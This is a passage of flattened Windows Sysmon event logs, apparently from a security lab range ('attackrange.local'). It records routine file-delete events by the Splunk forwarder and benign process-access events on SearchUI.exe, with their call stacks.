07:51:25.268{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=175C9FA0BF0ADBB0A96DEA26772075A9,SHA256=A6BFF3E7AA6793127A0CB5C45288A673BAF666B56675981477EBF496BDA0BF1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807385Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=415D2AEE35BC45F43BB32D411C8F6642,SHA256=D9E05D412AA50424002D4B1A2039C43AE2ECB830A919E8C7E7BD44918918756F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.695{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=603B669F8B5D0F3495C84BA176BEB9FB,SHA256=12863C6358CAD76ED8BA15BEE0D34C2AC532DA3147C98AF0A25850B35A8BC3AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.642{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.642{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.642{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.627{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.611{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.611{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.611{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.611{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.611{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.611{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.611{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.611{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.595{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.595{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.595{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 